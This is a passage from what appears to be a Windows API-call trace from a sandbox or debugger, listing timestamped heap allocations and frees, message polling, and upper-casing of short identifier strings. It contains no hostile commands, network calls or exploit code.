hHeap=0x25c0000) returned 1 [0206.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0206.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa278 [0206.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0206.698] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0206.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0206.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0206.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0206.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0206.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0206.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0206.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0206.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0206.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0206.699] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0206.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0206.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0206.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0206.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0206.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0206.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0206.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0206.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0206.700] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0206.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0206.700] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0206.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0206.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0206.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0206.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0206.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0206.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0206.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0206.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0206.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0206.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0206.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0206.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0206.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0206.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0206.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0206.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0206.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0206.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0206.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0206.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0206.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0206.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0206.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0206.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0206.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0206.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e10 [0206.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0206.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa968 [0206.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f30 [0206.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e40 [0206.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0206.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0206.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e70 [0206.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0206.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c48 [0206.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f00 [0206.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ac9f0 [0206.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d978 [0206.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0206.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9cc0 [0206.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aca50 [0206.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa068 [0206.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0206.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1e8 [0206.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa050 [0206.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0206.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0206.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0206.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0206.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0206.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0206.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0206.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0206.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0206.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0206.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0206.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0206.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0206.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0206.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0206.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0206.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0206.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0206.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0206.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0206.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0206.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0206.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0206.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0206.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0206.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0206.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0206.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0206.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0206.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0206.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0206.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0206.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0206.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0206.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0206.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0206.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d978 | out: hHeap=0x25c0000) returned 1 [0206.704] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0206.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0206.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0206.705] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0206.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0206.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0206.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0206.705] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0206.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0206.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0206.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa278 [0206.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0206.705] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0206.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0206.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0206.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0206.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0206.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0206.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0206.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0206.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0206.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0206.706] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0206.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0206.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0206.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0206.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0206.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0206.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0206.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0206.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0206.706] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0206.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0206.706] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0206.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0206.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0206.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0206.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0206.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0206.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0206.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0206.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0206.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0206.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0206.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0206.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0206.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0206.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0206.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0206.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0206.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0206.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0206.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0206.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0206.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0206.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0206.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0206.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0206.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0206.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0206.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0206.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0206.708] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0206.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0206.708] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0206.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0206.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0206.708] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0206.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0206.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0206.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0206.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0206.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0206.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0206.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0206.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0206.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0206.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0206.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0206.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0206.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0206.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0206.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0206.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0206.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0206.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0206.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0206.709] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0206.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0206.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0206.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0206.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0206.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0206.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0206.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0206.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0206.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0206.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0206.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0206.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0206.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0206.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0206.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0206.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0206.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0206.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0206.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0206.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0206.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0206.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0206.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0206.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0206.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0206.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0206.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0206.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0206.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0206.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0206.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0206.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0206.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0206.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0206.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0206.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0206.711] HeapFree (in: hHeap=0x25c0000, 